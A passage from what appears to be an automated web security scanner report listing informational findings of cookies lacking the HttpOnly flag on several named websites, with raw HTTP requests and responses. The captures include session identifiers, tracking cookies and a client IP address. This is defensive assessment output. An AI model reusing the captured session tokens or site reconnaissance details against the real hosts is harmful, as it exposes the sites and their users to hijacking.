Set-Cookie: KRONOS_PUBLIC_US=WntmyN5z9PTwW3dITu3dPTmlzgHQFsqFwJIqve05HUWIOX9pQUkyTzbW8Sh8AMxsm9G3H0e2qU1RztpCBrjx28ZfWtu9UPonnhB-lqbtv18bPhzsYu4EaTChKkmW_cMtT-iWtxAMfK68X75hYm-6Uuzr9Gjun_AXuk1KYvMoqvvnCwBB0; expires=Mon, 04-Jul-2011 00:13:41 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=by3m1fvhqslzgkurzbbrw5um; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 39469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_html1" xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...

16.183. http://www.livejournal.com/tools/endpoints/journalspotlight.bml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livejournal.com
Path:	/tools/endpoints/journalspotlight.bml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ljuniq=Xw061catQYuvMxT:1303742123:pgstats0:m0; expires=Friday, 24-Jun-2011 14:35:23 GMT; domain=.livejournal.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.184. http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netsuite.com
Path:	/pages/portal/page_not_found.jspinternal=T

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NS_VER=2011.1.0; domain=www.netsuite.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/portal/page_not_found.jspinternal=T HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=session#1303736347554-914602#1303743997|PC#1303736347554-914602.17#1304951737|check#true#1303742197

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 1229
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 15:13:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: NS_VER=2011.1.0; domain=www.netsuite.com; path=/

<!-- -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
...[SNIP]...

16.185. http://www.smpone.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
TresCMS[last_visit_temp]=1303733867; expires=Mon, 25-Apr-2011 12:27:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243

Response

16.186. http://www.smpone.com/404.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/404.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
TresCMS[last_visit_temp]=1303733869; expires=Mon, 25-Apr-2011 12:27:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /404.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.2.10.1303732845

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 12:17:49 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733869; expires=Mon, 25-Apr-2011 12:27:49 GMT; path=/
Content-Length: 0
Content-Type: text/html

16.187. http://www.smpone.com/News-more-79.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/News-more-79.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
TresCMS[last_visit_temp]=1303733967; expires=Mon, 25-Apr-2011 12:29:27 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /News-more-79.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=b07217b91d15829f50a400a4c700d48f; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.18.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:27 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733967; expires=Mon, 25-Apr-2011 12:29:27 GMT; path=/
Content-Type: text/html
Content-Length: 11498

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - </title>
<meta http-equiv="Content-Type" con
...[SNIP]...

16.188. http://www.smpone.com/News-more-80.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/News-more-80.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
TresCMS[last_visit_temp]=1303733965; expires=Mon, 25-Apr-2011 12:29:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /News-more-80.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=b07217b91d15829f50a400a4c700d48f; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.17.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733959

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:25 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733965; expires=Mon, 25-Apr-2011 12:29:25 GMT; path=/
Content-Type: text/html
Content-Length: 11467

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - </title>
<meta http-equiv="Content-Type" con
...[SNIP]...

16.189. http://www.smpone.com/News.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/News.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
TresCMS[last_visit_temp]=1303733958; expires=Mon, 25-Apr-2011 12:29:18 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /News.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Sections-read-16.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=b07217b91d15829f50a400a4c700d48f; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.16.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733952

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733958; expires=Mon, 25-Apr-2011 12:29:18 GMT; path=/
Content-Type: text/html
Content-Length: 12575

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - </title>
<meta http-equiv="Content-Type" con
...[SNIP]...

16.190. http://www.smpone.com/Sections-read-10.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/Sections-read-10.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
TresCMS[last_visit_temp]=1303733892; expires=Mon, 25-Apr-2011 12:28:12 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-10.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Sections-read-125.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.8.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733890

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:12 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733892; expires=Mon, 25-Apr-2011 12:28:12 GMT; path=/
Content-Type: text/html
Content-Length: 13895

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants - HIPAA</titl
...[SNIP]...

16.191. http://www.smpone.com/Sections-read-125.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/Sections-read-125.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
TresCMS[last_visit_temp]=1303733888; expires=Mon, 25-Apr-2011 12:28:08 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-125.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/images/menu_right.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733886; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.7.10.1303732845

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:08 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733888; expires=Mon, 25-Apr-2011 12:28:08 GMT; path=/
Content-Type: text/html
Content-Length: 11579

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Regulatory Compliance</title>
<meta http-equ
...[SNIP]...

16.192. http://www.smpone.com/Sections-read-126.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/Sections-read-126.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
TresCMS[last_visit_temp]=1303733895; expires=Mon, 25-Apr-2011 12:28:15 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-126.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Sections-read-10.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.9.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733893

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:15 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733895; expires=Mon, 25-Apr-2011 12:28:15 GMT; path=/
Content-Type: text/html
Content-Length: 12064

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - IT Assurance/Vulnerability Assessment</title
...[SNIP]...

16.193. http://www.smpone.com/Sections-read-16.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/Sections-read-16.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
TresCMS[last_visit_temp]=1303733881; expires=Mon, 25-Apr-2011 12:28:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-16.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.3.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733879

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:01 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733881; expires=Mon, 25-Apr-2011 12:28:01 GMT; path=/
Content-Type: text/html
Content-Length: 12154

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants</title>
<meta
...[SNIP]...

16.194. http://www.smpone.com/Sections-read-20.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/Sections-read-20.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
